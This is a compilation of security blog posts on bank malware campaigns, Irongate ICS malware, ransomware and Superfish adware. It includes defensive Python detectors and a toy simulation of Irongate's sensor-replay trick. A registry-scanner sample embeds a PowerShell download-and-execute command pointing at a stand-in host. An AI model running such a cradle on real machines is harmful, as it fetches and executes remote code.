Banking on Insecurity

They came for the money, they stayed for the data. There is far more at stake in financial services than dollars and sense. The past twelve months have shown how far attackers are willing and able to go; banks are known for their conservative pace in adopting new strategies, and attackers are literally banking on it.

As the saying goes, “In God we trust”. In banks, maybe not so much. According to a recent report by Capgemini, only one in five bank executives is “highly confident” in their ability to detect a breach, never mind defend against one. Yet “83% of consumers believe their banks are secure from cyber attack”. One in four banks reports having been attacked, but only 3% of consumers believe their bank has suffered a breach. Never mind the money. How about the data? The same survey shows that 71% of banks have neither a solid security strategy nor adequate data privacy practices in place. The numbers are not good. Only 40% of banking and insurance companies have automated security intelligence capabilities for proactive threat detection.

After following the trail of the SWIFT bank heists last year, I’ve paid close attention to banking malware, threat actors, and points of failure. What worries me is what’s coming as digital payments become the norm, and digital identities take hold in developing nations that lack the infrastructure or regulation to secure them or to enforce anything. Given what we already know, what does this recent history of attacks tell us?

Polish Banks
The recent series of targeted malware attacks against Polish banks was identified in January this year, and the attackers went after data, not money. After noticing unusual network activity, such as traffic to “exotic” locations, encrypted executables that nobody recognised, and unauthorised files on key machines in the network, several commercial banks confirmed malware infections. Investigations traced the infections to a tampered JavaScript file served from the web server of the Polish financial sector regulatory body. This was actually part of a wider campaign that has gone after financial institutions in over 30 countries.

According to researchers from both BAE Systems and Symantec, the malware used in Poland can be linked to similar attacks around the globe, and there are marked similarities to tools used by the Lazarus group, although no firm attribution has been made. This was a watering-hole attack: rather than luring targets to a malicious site, the attackers injected code into a legitimate site the targets already visited (here, the regulator’s), which redirected them to a customized exploit kit. The kit carried exploits for known vulnerabilities in Flash Player and Silverlight. What’s interesting is that the exploits were only served to certain visitors: those whose IP addresses fell within specific ranges. Per Symantec, “The IP addresses belong to 104 different organizations located in 31 different countries … The vast majority of these organizations are banks, with a small number of telecoms and internet firms on the list.” 15 of them are in the US. The payload that was downloaded performs reconnaissance on the compromised system, and again, this tool resembles ones used in the past by the Lazarus group.

Now every major security vendor has published its own analysis of what was originally all but overlooked as some malware that spread from the regulator’s server.

Fileless Malware Attacks
Early this year there were reports around the globe of attacks on banks using fileless malware: code that resides solely in the memory of compromised systems, leaving no file on disk for signature-based antivirus to scan. According to Kaspersky, 140 enterprises in 40 countries have been hit. And conventional disk forensics has little to work with; as Kaspersky puts it:

“… memory forensics is becoming critical to the analysis of malware and its functions. In these particular incidents, the attackers used every conceivable anti-forensic technique; demonstrating how no malware files are needed for the successful exfiltration of data from a network, and how the use of legitimate and open source utilities makes attribution almost impossible.”

But the infections are hard to identify, so that number could well be higher. Further complicating things is the use of legitimate and widely used sysadmin and security tools like PowerShell, Metasploit and Mimikatz to inject and run the malicious code. In a range of incidents, the common denominator seems to be a PowerShell script embedded in the registry that downloads Meterpreter. From there, the attack is carried out using native Windows utilities and sysadmin tools. Per Kaspersky:

[Kaspersky diagrams of the fileless attack chain]

The fileless approach hitting banks is reminiscent of Duqu 2.0, which Kaspersky found on its own corporate network in 2015, and only after it had gone undetected for months, because it lives almost completely in the memory of infected computers. Duqu 2.0 is the successor to Duqu, which in turn shared code with Stuxnet. Because it lives in memory, a reboot wipes most of its traces, so digital forensics has a tough time finding it. The calling card of the bank attacks seems to be the unusual embedding of PowerShell in the registry to download Meterpreter. Reports aren’t saying how the malware spreads.
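To make that calling card concrete, here is an added example (not code from the original post, from Kaspersky’s report, or from any recovered sample) that scans a `reg export` text dump for registry values that launch PowerShell, decodes the base64/UTF-16LE blob behind -EncodedCommand, and tags the usual download-cradle indicators. The .reg fragment, the value name “Updater” and the URL inside it are constructed for the example; the base64 is generated in code rather than typed in, so the decoder is exercised on realistic input.

```python
import base64
import re

# --- Constructed sample input -------------------------------------------
# A fragment in the text format produced by `reg export`. One entry is an
# ordinary Windows autorun; the other mimics the technique in Kaspersky's
# report: a PowerShell download cradle parked in a Run key. The value name
# "Updater", the hostname and the payload are invented for this example.
# The base64 is produced here with the encoding PowerShell's -EncodedCommand
# expects (base64 over UTF-16LE text).
SAMPLE_COMMAND = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
SAMPLE_B64 = base64.b64encode(SAMPLE_COMMAND.encode("utf-16le")).decode("ascii")
SAMPLE_REG = (
    "Windows Registry Editor Version 5.00\r\n"
    "\r\n"
    "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]\r\n"
    "\"SecurityHealth\"=\"%windir%\\\\system32\\\\SecurityHealthSystray.exe\"\r\n"
    f"\"Updater\"=\"powershell.exe -NoP -W Hidden -Enc {SAMPLE_B64}\"\r\n"
)

# "Name"="string data" lines only; hex(2)/hex(7) byte-list values are not handled here.
VALUE_RE = re.compile(r'^"(?P<name>(?:[^"\\]|\\.)*)"="(?P<data>(?:[^"\\]|\\.)*)"$')
# -e, -ec, -enc, -EncodedCommand ...: PowerShell accepts any unambiguous prefix.
ENC_FLAG_RE = re.compile(r"-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
INDICATORS = ("IEX", "Invoke-Expression", "DownloadString", "DownloadFile",
              "Net.WebClient", "Invoke-WebRequest", "FromBase64String",
              "-W Hidden", "-NoP")


def unescape_reg(s):
    """Undo the backslash escaping (\\\\ and \\") used in .reg string values."""
    return re.sub(r"\\(.)", r"\1", s)


def decode_encoded_command(cmdline):
    """Return the plaintext behind an -EncodedCommand argument, or None if absent/invalid."""
    for m in ENC_FLAG_RE.finditer(cmdline):
        flag, blob = m.group(1).lower(), m.group(2)
        if not "encodedcommand".startswith(flag):
            continue  # e.g. -ExecutionPolicy also starts with -e
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def scan_reg_export(text):
    """Find registry string values that launch PowerShell; decode and tag each one."""
    findings = []
    current_key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current_key = line[1:-1]
            continue
        m = VALUE_RE.match(line)
        if not m:
            continue
        data = unescape_reg(m.group("data"))
        if "powershell" not in data.lower():
            continue
        decoded = decode_encoded_command(data)
        haystack = (data + " " + (decoded or "")).lower()
        findings.append({
            "key": current_key,
            "name": unescape_reg(m.group("name")),
            "command": data,
            "decoded": decoded,
            "indicators": [i for i in INDICATORS if i.lower() in haystack],
        })
    return findings


if __name__ == "__main__":
    for f in scan_reg_export(SAMPLE_REG):
        print(f["key"], f["name"], f["indicators"])
        print("  decoded:", f["decoded"])
```

Run it against the output of `reg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run run.reg` (and the HKCU Run keys, RunOnce, and services), and remember that REG_EXPAND_SZ and REG_MULTI_SZ values come out as hex(2)/hex(7) byte lists that the parser above deliberately skips; those need decoding too before you can call a host clean.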

TESCO Bank Attack
In November 2016, Tesco Bank, the retail bank owned by the British supermarket chain, with about 7 million customers, warned customers to watch for suspicious withdrawals. Unfortunately, when customers who noticed money missing from their accounts tried to reach the bank, many could not get through. Approximately 20,000 accounts were reported hit, and Tesco briefly halted online transactions in response. The attack appeared to stem from a “systemic failure of security around Tesco’s core database”. Recommendations include having controls in place that alert on changes to key files and configurations; file integrity monitoring and configuration management ensure that if and when changes are made, they are valid and validated.

Take the Money and Run:  COBALT, ATMs and ‘Jackpotting’
There was a distinct rise in ATM attacks over 2016. The latest campaign, which Group-IB has named Cobalt, covers a wide swath across the UK, Spain, Russia, Romania, the Netherlands, much of Eastern Europe and Malaysia. According to Group-IB researchers, a large number of machines are attacked at once, and Cobalt appears to be linked to the cybercrime syndicate Buhtrap. The malware causes infected machines to spit out cash, an attack known as “jackpotting”. Noteworthy is how this is being described as “the new model of organized crime”. The FBI issued warnings to US banks following these ATM heists, taking into account the attacks in Taiwan and Thailand, where thieves grabbed over £260,000 from Thailand’s Government Savings Bank and $2.5 million in Taiwan. The world’s two largest ATM manufacturers, NCR and Diebold Nixdorf, worked to manage the threat.

Lloyds Bank Hit by DDoS Attack
In January, Lloyds Bank was struck by a DDoS attack that lasted two days. Attackers tried to knock the Lloyds site offline, causing issues for customers and disrupting some access to online banking. The bank lost neither money nor data, and the impact was not significant. Law enforcement is investigating.

Attacks on Banks in the SWIFT System
Banks rely on messaging systems to conduct transfers back and forth. In 2016, a series of targeted attacks on banks using the trusted SWIFT messaging network came to light after the massive heist at Bangladesh Bank. The attacks are evolving: in a letter to member banks dated Nov. 2 that was not made public, SWIFT said that “attacks on its systems have only become more sophisticated in their strategies”, and that “The threat is very persistent, adaptive and sophisticated – and it is here to stay”. This is despite the work by regulators globally to toughen bank security measures. And the word is that “a fifth of them are hitting paydirt for the attackers”, per Stephen Gilderdale, head of SWIFT’s Customer Security Programme. The attackers now exploit technical support software to gain access, then send phony payment instructions over the SWIFT network from the victim’s own systems. SWIFT emphasizes that all of the attacks detected “exploited SWIFT interfaces used by its customers”, but that the SWIFT communications network itself was not compromised. In light of this, warnings are being issued to small businesses that the threat to them is real. Scams have become more sophisticated and will continue to evolve.

Sources:

https://badcyber.com/several-polish-banks-hacked-information-stolen-by-unknown-attackers/
https://securelist.com/blog/research/77403/fileless-attacks-against-enterprise-networks/
https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware-0
https://baesystemsai.blogspot.sk/2017/02/lazarus-watering-hole-attacks.html
https://threatpost.com/fileless-memory-based-malware-plagues-140-banks-enterprises/123652/
http://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/?utm_source=organic%20twitter&utm_medium=news&utm_campaign=WLS
http://economictimes.indiatimes.com/industry/banking/finance/banking/indian-banks-are-waking-up-to-a-new-kind-of-cyber-attack/articleshow/56575808.cms
https://www.f-secure.com/documents/996508/1030743/cyber-security-report-2017

Irongate & Customized ICS Malware: Don’t Hit the Snooze Button This Time


ICS, or Industrial Control System, networks are integral to running our critical infrastructure, industrial and manufacturing processes, and hospitals. These are specialized systems that have traditionally been kept separate, or “air gapped”, from business networks, but that has been changing over the past few years as everybody finds ways to get connected. However, a mindset persists that because these systems are “special” and “different”, and because they have been segregated from conventional networks for so long, they are inherently protected. This past week brought the disclosure of “Irongate”, customized malware for ICS that appears to be still in the testing stages and has not been used against production facilities – yet. The fact that somebody has carried on from where Stuxnet left off is a warning to us all that our assumptions about what keeps us secure no longer apply.

Stuxnet showed us that specialized systems offer attackers, especially at the nation-state level, a unique opportunity, for exactly this reason: nobody is looking when they think they are secure. The fact is that attackers live within our networks for long periods. We have seen this proven in recent months through the rapid escalation of ransomware and lateral movement through networks to gather information and destroy data; in the attack on the power grid in Ukraine, where attackers harvested credentials to access the VPN and get into supposedly secure systems; and in the SWIFT banking heists, where attackers learned the most intricate details of how to manipulate printer output and redirect huge monetary transactions.

“Air gaps” are great in theory, but don’t hold up given the growing reality of the IoT and now the IIoT. With pressure to cut costs, increase productivity, and just make things easier, these systems are being connected to corporate networks and the “cloud”. There’s a whole lot of scary here, because the truth is that ICS systems are not well monitored. Experts like Chris Sistrunk and Robert M. Lee have made this pointedly clear in emphasizing the need for NSM (network security monitoring) and DFIR (digital forensics and incident response) to look for what attackers leave behind. You can’t find the danger if you aren’t looking.

While the big announcement of Irongate came this week, researchers actually found samples in late 2015, and reports show that the malware can be dated as far back as 2012; it was submitted to VirusTotal through the web interface from Israel in 2014. There is no evidence of it having been used in any campaign, nor is it associated with known threat actors. Siemens ProductCERT confirmed that “the code would not work against a standard Siemens control system environment”. As it stands, it looks like a test case or proof of concept rather than a deployed weapon. Yet the code was found while searching for droppers compiled with PyInstaller; Irongate’s droppers are Python scripts converted to executables with that same tool. Somebody saw the need to make this, and the opportunity for exploitation. We need to read into that and act on it before it moves from test to production.

According to Robert M. Lee,

“ICS is a viable target and attackers are getting smarter on how to impact ICS with ICS specific knowledge sets… The unique nature of ICS offers defenders many advantages in countering adversaries but it is not enough. You cannot rest on the fact that ‘ICS is unique’ or ‘ICS can be hard to figure out’ as a defense mechanism. It is a great vantage point for defenders but must be taken advantage of or adversaries will overcome it.”

Right now, there is a lot of speculation around why this exists in test, without a known contributor. Dan Scali, senior manager for FireEye Mandiant ICS Consulting, posits: “Is someone trying this in a simulated [environment] before taking it to a production environment? Or is it a researcher saying ‘look what I can do … a Stuxnet-type thing?’”

Robert M. Lee expressed concern that this illustrates a fundamental security problem with ICS/SCADA. “It’s a sign of the interest in this by pen testers, security companies, as well as adversaries…I am not confident that a majority of the industry could respond to it. We don’t know what’s out there; antivirus companies aren’t finding it and even if they had, who would know what to do with it [the threat]?”

If we’re not looking, we’re not finding. And we won’t be able to prepare for attacks which are already in the works. We would be foolish to think otherwise.

The same argument is made by Lior Frenkel, CEO of Waterfall Security. He expects attacks similar to Stuxnet “are in the pipeline”:

“… these attacks will increase in their sophistication and complexity so any solution needs to be completely comprehensive and robust to cover the full perimeter of an ICS site”, adding that “unidirectional gateways are the optimal solution for these attacks”.

Add to that this assertion by Sean McBride, attack synthesis lead for FireEye iSIGHT Intelligence: “I would not be surprised to see sandbox evasion and file replacement attacks incorporated by future ICS malware deployed in the wild.” This is yet another wake-up call for ICS/SCADA and other sensitive, segregated systems.

Irongate:

  • is sophisticated,
  • has the capacity to be persistent,
  • is evasive,
  • is undetected by AV, and
  • introduces new features to existing knowledge of customized ICS malware.

The key feature is a man-in-the-middle (MitM) attack: the malware replaces an existing DLL (Dynamic Link Library) with a malicious one, placing itself between a PLC and the legitimate monitoring software. Like a scene from a movie where the security camera footage is manipulated, the malicious DLL records five seconds of “normal” traffic from the PLC to the user interface. This “footage” is then played back on a loop to the operator while different data is sent to the PLC. Hence an attacker can alter a controlled process without alerting the process operators.
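The record-and-replay trick is easier to reason about in code. What follows is an added illustration written for this post, not Irongate’s DLL or any FireEye code: a toy PLC that drives one process value toward a setpoint, an honest communication link, and a replaying link that records five readings and then loops them to the HMI while pushing its own setpoint to the PLC and dropping the operator’s. It also shows one defender-side check that needs nothing but the HMI’s own data: genuine sensor telemetry never repeats bit-for-bit, so an exactly periodic tail is a strong sign of replay. The process model, its noise and the attacker’s setpoint of 90 are all assumptions made for the simulation.

```python
import random


class Plc:
    """Toy controller: one process value (say, a pressure) that the PLC drives
    toward a setpoint each scan cycle, with a little seeded sensor noise so that
    consecutive readings are never bit-identical, as real telemetry is not."""

    def __init__(self, setpoint=50.0, seed=7):
        self.setpoint = setpoint
        self.value = setpoint
        self.rng = random.Random(seed)

    def write_setpoint(self, setpoint):
        self.setpoint = setpoint

    def scan(self):
        self.value += 0.3 * (self.setpoint - self.value) + self.rng.uniform(-0.5, 0.5)

    def read(self):
        return self.value


class HonestLink:
    """The legitimate communication DLL: passes reads and writes straight through."""

    def __init__(self, plc):
        self.plc = plc

    def read(self):
        return self.plc.read()

    def write_setpoint(self, setpoint):
        self.plc.write_setpoint(setpoint)


class ReplayLink:
    """Stand-in for the malicious DLL: records `record_len` normal readings, then
    loops that 'footage' to the HMI while the attacker's setpoint goes to the PLC
    and the operator's own setpoint writes are silently dropped."""

    def __init__(self, plc, record_len=5, attacker_setpoint=90.0):
        self.plc = plc
        self.record_len = record_len
        self.attacker_setpoint = attacker_setpoint
        self.recording = []
        self.cursor = 0

    def read(self):
        if len(self.recording) < self.record_len:
            self.recording.append(self.plc.read())
            if len(self.recording) == self.record_len:
                # Footage ready: now push the process where the attacker wants it.
                self.plc.write_setpoint(self.attacker_setpoint)
            return self.recording[-1]
        value = self.recording[self.cursor % self.record_len]
        self.cursor += 1
        return value

    def write_setpoint(self, setpoint):
        if len(self.recording) < self.record_len:
            self.plc.write_setpoint(setpoint)  # still transparent while recording


def run(plc, link, cycles=30):
    """Drive the process; return (what the HMI displayed, what the process really did)."""
    hmi_view, truth = [], []
    for _ in range(cycles):
        plc.scan()
        hmi_view.append(link.read())
        truth.append(plc.read())
    return hmi_view, truth


def replay_period(series, window=20, max_period=10):
    """Defender-side check using only HMI-visible data: real sensor feeds never
    repeat bit-for-bit, so an exactly periodic tail betrays replayed footage.
    Returns the period found, or None."""
    tail = series[-window:]
    for p in range(1, max_period + 1):
        if len(tail) > p and all(tail[i] == tail[i + p] for i in range(len(tail) - p)):
            return p
    return None


def demo():
    honest_plc = Plc()
    honest_view, honest_truth = run(honest_plc, HonestLink(honest_plc))
    victim_plc = Plc()
    victim_view, victim_truth = run(victim_plc, ReplayLink(victim_plc))
    return {
        "honest_period": replay_period(honest_view),
        "honest_gap": max(abs(h - t) for h, t in zip(honest_view, honest_truth)),
        "attack_period": replay_period(victim_view),
        "attack_gap": max(abs(h - t) for h, t in zip(victim_view, victim_truth)),
        "attack_final_truth": victim_truth[-1],
        "attack_final_view": victim_view[-1],
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Two caveats. A smarter replayer could add jitter to the footage, so the periodicity check is a tripwire rather than a guarantee; and the out-of-band comparison (`attack_gap`, the HMI view against an independent reading of the process) is the check that really matters, which is exactly why independent sensors and network monitoring of the PLC link beat trusting the HMI alone.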

Causes for concern: this malware was undetected by AV, even though some strings contained the word “dropper” and there was an actual module named scada.exe; and the malware is evasive, refusing to run if it detects a VMware or Cuckoo Sandbox environment – something Stuxnet did not do.

Although Irongate is not as complex, the similarities to Stuxnet stand out:

  • Both search for a single, highly specific process.
  • Both replace DLLs to manipulate processes.
  • Both are evasive. Irongate looks for VMware or a sandbox that would allow observation of the malware; Stuxnet sought out antivirus software.
  • Both manipulate process data. Irongate, however, actively records and plays back to conceal its manipulations.

A key difference is that unlike Stuxnet, “Irongate has no worm-like spreading function, nor any apparent ties to nation-state actors”.

Recommendations on how to secure against this latest variant of ICS malware include integrity checks on code. But it really comes down to following through on best practices and on those areas already identified as weak. The problem is that what we’ve been doing will fail us going forward, and we’re failing at doing the basics right. Know your baselines and actively look for anomalies. NSM needs to happen, as does DFIR within ICS, comprehensively and without further delays or excuses. Otherwise, we are turning a blind eye to attackers who know these systems better than we do.
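The Tesco recommendation in the banking piece above (alert on changes to key files) and the Irongate recommendation for integrity checks come down to the same control, file integrity monitoring, so here is one added example that serves both; it is not the monitoring used by any bank or vendor. It baselines a directory by SHA-256, stores the baseline as JSON (keep that copy off the host, or signed), and reports added, removed and modified files on a later pass. The demo directory, the file names (hmi.exe, comm.dll, scada.exe) and their contents are constructed; the point it makes is that a same-size replacement with its timestamp restored is invisible to size- or mtime-based checks, but not to a content hash.

```python
import hashlib
import json
import os
import tempfile
from pathlib import Path


def sha256_of(path, chunk=1 << 16):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def snapshot(root):
    """Hash every regular file under root. Keyed by POSIX-style relative path so a
    baseline taken on one host can be compared on another."""
    root = Path(root)
    snap = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and not p.is_symlink():
            st = p.stat()
            snap[p.relative_to(root).as_posix()] = {
                "sha256": sha256_of(p),
                "size": st.st_size,
                "mtime_ns": st.st_mtime_ns,
            }
    return snap


def compare(baseline, current):
    """Classify changes by content hash, never by timestamp or size alone."""
    base_paths, cur_paths = set(baseline), set(current)
    return {
        "added": sorted(cur_paths - base_paths),
        "removed": sorted(base_paths - cur_paths),
        "modified": sorted(p for p in base_paths & cur_paths
                           if baseline[p]["sha256"] != current[p]["sha256"]),
    }


def demo():
    """Constructed scenario: baseline an engineering workstation's program folder,
    then replace a comms DLL with a same-size file, timestomp it back to the
    original mtime (as an attacker would), and drop an extra executable."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "bin" / "hmi.exe").write_bytes(b"H" * 128)
        dll = root / "bin" / "comm.dll"
        dll.write_bytes(b"A" * 64)
        baseline = snapshot(root)
        baseline_json = json.dumps(baseline, indent=1)   # what you would store off-host

        st = dll.stat()
        dll.write_bytes(b"B" * 64)                          # same size, new content
        os.utime(dll, ns=(st.st_atime_ns, st.st_mtime_ns))  # timestomp
        (root / "bin" / "scada.exe").write_bytes(b"S" * 32)

        current = snapshot(root)
        result = compare(json.loads(baseline_json), current)
        result["mtime_unchanged"] = (
            baseline["bin/comm.dll"]["mtime_ns"] == current["bin/comm.dll"]["mtime_ns"])
        result["size_unchanged"] = (
            baseline["bin/comm.dll"]["size"] == current["bin/comm.dll"]["size"])
        return result


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

In production you would run `snapshot()` over the control software’s program directories from known-good media, ship the baseline off the host, and compare on a schedule; any hit under `modified` for a DLL in a control-software install is an incident until proven otherwise.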

This latest variant of customized ICS malware may be in the testing stages as we found it. But you can bet if someone else is working on this, things have already moved toward production and deployment. Irongate is yet another major wakeup call and we can’t keep hitting the snooze button.

Resources:

https://www.fireeye.com/blog/threat-research/2016/06/irongate_ics_malware.html

https://www.helpnetsecurity.com/2016/04/13/ics-network-attacks/?utm_content=buffer3b349&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer

http://www.darkreading.com/threat-intelligence/shades-of-stuxnet-spotted-in-newly-found-ics-scada-malware-/d/d-id/1325753

https://www.helpnetsecurity.com/2016/06/03/ics-focused-irongate-malware/

The Future of Ransomware


Ransomware is like a nasty game of tag: you can try to avoid it, but once you’re hit, you’re out. For all we know about doing defence right, following the best practices advocated by NIST and SANS, this particularly malevolent threat has been on an upward trajectory since the start of 2016, after trending up through 2015. It’s gone way beyond phishing for targets and locking individual files. Current strains are evasive: like a kid playing tag, they work out what anti-virus and security tooling is running on the target system and stay hidden from it. They now go after websites. They lock down entire servers. And they don’t care who the victims are – not even hospitals.

[Figure: SamSam ransomware attack chain]

If you’ve been reading along with me on Twitter, or happen to be up at 2:00 a.m. like I am, you know that ransomware is what keeps me up at night. Along with some other brilliant minds in our security community who are dedicated to tracking and shutting down this ever-growing threat. These guys really know what they’re doing. Countless hours of research, investigation and analysis have produced this paper:  Ransomware: Past, Present, and Future.   There are definitive pieces that give the lay of the land and map out the course ahead. That is what this piece does. Sincere appreciation for the efforts of  @da_667 @munin @ImmortanJo3 @wvualphasoldier (and others) who put this together. They understand just how widespread the risk is, and time is not a luxury we have. This is essential reading for anyone in tech, security, business, critical infrastructure. Essentially, anyone who needs to safeguard the data and networks their daily business relies on.

From the Talos blog: A fictional Adversary’s workflow of compromise and takeover


Right now, here is what I would advise anyone. Back your stuff up, frequently, and keep the backups separate from the network. Check your patch management situation. Where are your exposures? How are you handling security awareness, especially around phishing? Do you monitor your systems regularly, so that you have a baseline to compare events against?

And finally, take the time now and please read this: Ransomware: Past, Present and Future by Talos. Because the more people who know about ransomware and where it’s headed, the better we can all work together to secure things.

Thank you for stopping by!

Superfish and Lenovo: One Big Fish Fry

“Superfish” by @EddieTheYeti

There’s a nasty little game afoot where new laptops come with undesirable extras. I’m talking about “crapware” – all those annoying little programs and invitations to sign up and buy that suddenly fill your screen moments after you first boot up. That’s not the way anyone deserves to experience those heady first moments with a major new purchase. And yet, it’s exactly what happens with nearly all new laptops and PCs.

If you ask, you’re told that it’s been in practice by big companies for a while; that it’s the way business is done; that it’s nothing to worry about.  That doesn’t make it right.  And as of today, that doesn’t make it safe.

It has been discovered that the plethora of advertising extras pre-installed on Lenovo laptops contains a hidden danger. A piece of adware known as “Superfish Visual Discovery” actually conducts a type of attack known as “MitM”, or man-in-the-middle: it alters that lovely new laptop’s configuration and compromises a key security component, the system’s store of trusted certificates. And no, that is not supposed to happen. Which is why I think it’s time to speak up and speak out about this practice.

Plenty of top-drawer security and tech experts are currently dissecting and revealing the ugly truth about “Superfish”. Simply put by Marc Rogers on Marc’s Security Ramblings:

Lenovo is installing adware that uses a “man-in-the-middle” attack to break secure connections on affected laptops in order to access sensitive data and inject advertising. As if that wasn’t bad enough they installed a weak certificate into the system in a way that means affected users cannot trust any secure connections they make – TO ANY SITE.

Rik Ferguson offers this explanation on CounterMeasures:

Superfish also installs its own self-signed Root Certificate Authority… Superfish can generate any certificate it wants, which will be trusted by your browser as entirely legitimate, allowing it to impersonate any destination on the internet. These sites are normally protected by strong encryption for your security

Rob Graham on Errata Security described how he was able to “intercept the encrypted communications of SuperFish’s victims (people with Lenovo laptops)”. On Twitter, he challenged the claim by Peter Hortensius, CTO of Lenovo, that the problem was “theoretical”, saying that he had tested it and proved otherwise. And Steve Ragan on Salted Hash Security News hits the nail on the head when he states:

Even if the user removes the Superfish software, the certificate remains trusted and installed on the system. As for the opt-in requirement, most users agree to everything when configuring a new system, assuming they even notice the Superfish TOS to begin with.

What really bothers me is that most users don’t have the technical skillsets to understand what is actually happening, let alone to diagnose and disinfect. From my years of experience working with end users, cleaning up this kind of mess definitely falls outside reasonable expectations of what we should ask most people to do. Helping folks overcome their fear of technology is always challenging. Most people would just like the problem to go away. Or for someone else to fix it. There is a point to which you can lead users, but then they balk.

My team and I are all about simplifying technology for users. And honestly, if you can teach someone the easy ways to do things right, like security, then it’s like teaching that proverbial man to fish: they’ll be fine for the rest of their lives. But there is nothing simple about cleaning up malware, spyware, adware and the technical mess they inflict on devices.  Nobody who really cares about their customers should be asking them to start prodding around in program or registry files even if the customer is technically qualified.  Because confusion happens and mistakes can be made.

It’s really great to hear the outcry against what’s been going on, and to put the issue squarely in front of major manufacturers. Time for certain parties to take a good look in the mirror: how can you proclaim your commitment to improving security when you’re actually contributing to a key source of problems? I love this statement by Marc Rogers on Marc’s Security Ramblings:

We trust our hardware manufacturers to build products that are secure. In this current climate of rising cybercrime, if you can’t trust your hardware manufacturer you are in a very difficult position

That said, what can you do about it? First and foremost, you need to get that junk off your device. I’m happy to report that some terrific folks have been addressing that, and there are good suggestions on how to detect and remove it. For those inclined to take the task on, read the steps through carefully a couple of times to make sure they’re clear before you undertake anything. I can recommend this piece by PC World. As well, I found this piece by ZDNet a little more detailed and perhaps easier to follow.
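One check anyone comfortable with a command line can run for themselves, as an added example (not from PC World, ZDNet or the researchers quoted above): list the trust anchors your system trusts and flag any self-signed root whose organisation is not on your list of known CAs. The audit function works on the dictionaries that Python’s `ssl.SSLContext.get_ca_certs()` returns, so `system_roots()` gives you the live list (on Windows this reads the OS ROOT and CA stores). The sample certificates are constructed for the example, with the Superfish entry modelled as a self-signed root named after the vendor, and the allow-list of expected organisations is an assumption you would replace with your own.

```python
import ssl


def name_to_dict(name):
    """Flatten the ((('countryName', 'US'),), ...) tuples that ssl returns
    for subject/issuer into a plain {attribute: value} dict."""
    out = {}
    for rdn in name:
        for attr, value in rdn:
            out[attr] = value
    return out


def audit_roots(certs, expected_orgs):
    """Return every self-signed root (subject == issuer) whose organization is not
    on the allow-list. `certs` is a list of dicts in the shape produced by
    ssl.SSLContext.get_ca_certs()."""
    suspicious = []
    for cert in certs:
        subject = name_to_dict(cert["subject"])
        issuer = name_to_dict(cert["issuer"])
        if subject != issuer:
            continue  # an intermediate, not a trust anchor
        org = subject.get("organizationName") or subject.get("commonName", "")
        if org not in expected_orgs:
            suspicious.append({
                "commonName": subject.get("commonName"),
                "organizationName": subject.get("organizationName"),
                "serialNumber": cert.get("serialNumber"),
                "notAfter": cert.get("notAfter"),
            })
    return suspicious


def system_roots():
    """Live version: load the OS trust store (on Windows, the ROOT and CA stores)
    and return the CA certificates Python would trust."""
    ctx = ssl.create_default_context()
    ctx.load_default_certs()
    return ctx.get_ca_certs()


def _name(**attrs):
    """Build a subject/issuer in ssl's nested-tuple shape from keyword attributes."""
    return tuple(((attr, value),) for attr, value in attrs.items())


# --- Constructed sample input: two roots and one intermediate in get_ca_certs() shape.
# Names, serial numbers and dates are invented for this example.
SAMPLE_CERTS = [
    {"subject": _name(countryName="US", organizationName="Example Trust Services",
                      commonName="Example Root CA"),
     "issuer": _name(countryName="US", organizationName="Example Trust Services",
                     commonName="Example Root CA"),
     "serialNumber": "01", "notBefore": "Jan  1 00:00:00 2010 GMT",
     "notAfter": "Jan  1 00:00:00 2030 GMT"},
    {"subject": _name(countryName="US", organizationName="Example Trust Services",
                      commonName="Example Issuing CA 1"),
     "issuer": _name(countryName="US", organizationName="Example Trust Services",
                     commonName="Example Root CA"),
     "serialNumber": "02", "notBefore": "Jan  1 00:00:00 2014 GMT",
     "notAfter": "Jan  1 00:00:00 2024 GMT"},
    {"subject": _name(countryName="US", stateOrProvinceName="CA", localityName="SF",
                      organizationName="Superfish, Inc.", commonName="Superfish, Inc."),
     "issuer": _name(countryName="US", stateOrProvinceName="CA", localityName="SF",
                     organizationName="Superfish, Inc.", commonName="Superfish, Inc."),
     "serialNumber": "03", "notBefore": "May 12 00:00:00 2014 GMT",
     "notAfter": "May 12 00:00:00 2034 GMT"},
]

# Assumed baseline: the organisations whose roots you expect to find on your fleet.
EXPECTED_ORGS = {"Example Trust Services"}


if __name__ == "__main__":
    for hit in audit_roots(SAMPLE_CERTS, EXPECTED_ORGS):
        print("unexpected trust anchor:", hit)
```

A root that shouldn’t be there is only half the story; as Steve Ragan notes above, it survives uninstalling the adware, so the fix is removing the certificate itself (certmgr.msc on Windows), not just the program. And browsers that keep their own trust store, Firefox for one, have to be checked separately.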

Crapware serves no purpose other than garnering profit.  Lenovo has a PR nightmare ahead, and they have a lot to answer for. While they claim to have halted shipping it back in January, that does nothing about what’s already out there.  Hopefully this serves notice to other distributors about cleaning up their acts so they don’t get caught up in the same net with “Superfish”.   Because the only real victims in this fish fry are the end-users.

NOTE: The awesome pic up at the top is by talented InfoSec member and artist @EddieTheYeti

Security Patches: One Step Forward, Two Steps Back


Security breaches, mass DDoS attacks, ransomware mutations. No question about it – the challenges to information security are constant and ever-changing. Over the past twelve months, InfoSec has had to deal with threats not only of a greater magnitude in complexity but also in sheer volume. So in our concerted, and at times hasty, efforts to keep up with all that’s out there, are we leaving ourselves exposed? Do we need to double-back and cover our tracks?

Fact is, there is a lot to keep up with, even for security super-heroes. Given the nature of the beast, we’re always looking forward, trying to keep up or gain a little ground to ready ourselves for the next challenge. But what about those “backdoors” we just closed?

